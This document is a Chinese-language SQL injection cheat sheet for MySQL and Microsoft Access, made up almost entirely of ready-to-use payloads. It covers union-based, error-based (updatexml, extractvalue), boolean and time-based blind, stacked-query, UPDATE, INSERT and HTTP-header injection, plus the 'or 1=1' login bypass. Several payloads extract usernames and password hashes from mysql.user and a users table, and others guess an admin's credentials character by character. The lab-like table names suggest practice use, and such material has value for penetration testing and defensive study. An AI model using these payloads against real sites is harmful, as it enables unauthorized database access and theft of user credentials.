========MySQL数据库
SQL查询语句
- 获取数据库信息
select user(),version(),database(),@@datadir,@@version_compile_os
- 获取数据库名字
select schema_name from schemata;
select schema_name from information_schema.schemata;
select group_concat(distinct table_schema) from tables;
select group_concat(distinct table_schema) from information_schema.tables;
- 获取数据库表名字
select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
select group_concat(distinct table_name) from information_schema.tables where table_schema=database();
- 获取字段名
select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';
- 获取字段内容
select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;
联合查询注入
判断注入(略)、判断字段(列)数
union select
order by
查看回显位
union select 1,2,3,4,……
获取数据库信息,假设回显位为1,2
union select version(),user(),3%23
获取数据库名字
union select null,schema_name,null from information_schema.schemata%23
union select 1,schema_name,3 from information_schema.schemata%23
union select null,group_concat(schema_name),null from information_schema.schemata%23
获取数据库表
union select null,group_concat(table_name),null from information_schema.tables%23//获取所有数据库表
union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23//获取指定的数据库zaqtest的表
union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23//获取当前web系统的数据库的表
获取users表的字段名
union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23
获取字段内容
union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23
报错注入
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
and exp(~(select * from(select user())a))
(!(select * from (select user())x) - ~0)
布尔盲注
and if(mid(user(),1,1),1,0)
and if(mid(user(),1,1)='r',1,0)
and (select user() like 'r%' from tables limit 0,1)
时间盲注
and if(1=1,sleep(3),1)
堆叠查询
okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';
update注入
update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk'
insert 注入
insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');
http头注入
HTTP头中以下几个字段是常见的注入点:
X-Forwarded-For
Host
User-agent
Referer
X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')
万能密码
or 1=1
========ACCESS数据库
1.报错信息:
and exists(select * from MSysAccessObiects)
and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0
2.猜表:
and exists(select * from tables) #返回正常说明表存在!
3.猜字段和字段内容
(1)猜字段数
order by 5
union select 1,2,3,4...
接着猜字段数: order by 3
假设猜到字段数是3 然后查看回显位: union select 1,2,3
(2)猜字段名
先猜字段名:
and exists(select username from admin) #返回正常表示 username 存在
and exists(select password from admin) #返回正常表示 password 存在
二分法猜字段长度和内容:
猜长度:
and (select top 1 len(username) from admin)>30 //error
and (select top 1 len(username) from admin)<30 //True,接着二分法
猜内容:
and (select top 1 ascii(mid(username,1,1))>97 from admin) //true
and (select top 1 ascii(mid(username,1,1))>114 from admin) //error
证明admin表的第一个记录的username字段的第一个字母的ASCII码